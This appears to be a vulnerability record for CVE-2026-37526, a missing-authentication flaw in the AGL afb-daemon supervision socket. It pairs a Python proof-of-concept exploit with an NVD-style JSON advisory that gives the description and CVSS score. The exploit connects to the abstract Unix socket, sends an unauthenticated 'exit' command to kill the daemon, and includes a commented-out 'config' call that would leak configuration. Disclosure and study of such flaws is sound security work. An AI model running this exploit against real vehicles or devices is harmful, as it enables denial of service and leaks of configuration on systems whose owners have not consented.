CVE-2026-37526

import socket import json import struct # Target abstract Unix socket path SOCKET_PATH = "@urn:AGL:afs:supervision:socket" def send_exploit_command(command, args=None): """ Exploit function to send unauthenticated commands to the afb-daemon. """ try: # Create a Unix socket sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) # Connect to the abstract socket (path starts with null byte) sock.connect(b'\x00' + SOCKET_PATH[1:].encode('utf-8')) # Construct the payload (JSON format) payload = { "id": 1, "call": command, "args": args if args else {} } message = json.dumps(payload) print(f"Sending payload: {message}") sock.sendall(message.encode('utf-8')) # Receive response response = sock.recv(4096) print(f"Received response: {response.decode('utf-8')}") sock.close() return True except Exception as e: print(f"Error: {e}") return False if __name__ == "__main__": # Example 1: Cause Denial of Service by killing the daemon print("[*] Attempting to kill daemon (Exit command)...") send_exploit_command("exit") # Example 2: Leak global configuration # print("\n[*] Attempting to leak configuration (Config command)...") # send_exploit_command("config")

{"cve": {"id": "CVE-2026-37526", "sourceIdentifier": "[email protected]", "published": "2026-05-01T17:16:22.440", "lastModified": "2026-05-07T15:15:55.993", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "AGL app-framework-binder (afb-daemon) through v19.90.0 allows any local process to execute privileged supervision commands (Exit, Do, Sclose, Config, Trace, Debug, Token, slist) without authentication via the abstract Unix socket @urn:AGL:afs:supervision:socket. The on_supervision_call function in src/afb-supervision.c dispatches all 8 commands without any credential verification. The abstract socket has no DAC protection, as acknowledged in the official CAUTION comment in src/afs-supervision.h. This allows a low-privileged local process to kill the daemon (DoS via Exit command), execute arbitrary API calls (via Do command), close arbitrary user sessions (via Sclose command), or leak the entire global configuration (via Config command). The vulnerability was introduced in commit b8c9d5de384efcfa53ebdb3f0053d7b3723777e1 on 2017-06-29."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://gerrit.automotivelinux.org/gerrit/src/app-framework-binder", "source": "[email protected]"}, {"url": "https://gist.github.com/sgInnora/8526eedcfd826d05ef1fc45d8f405643", "source": "[email protected]"}]}}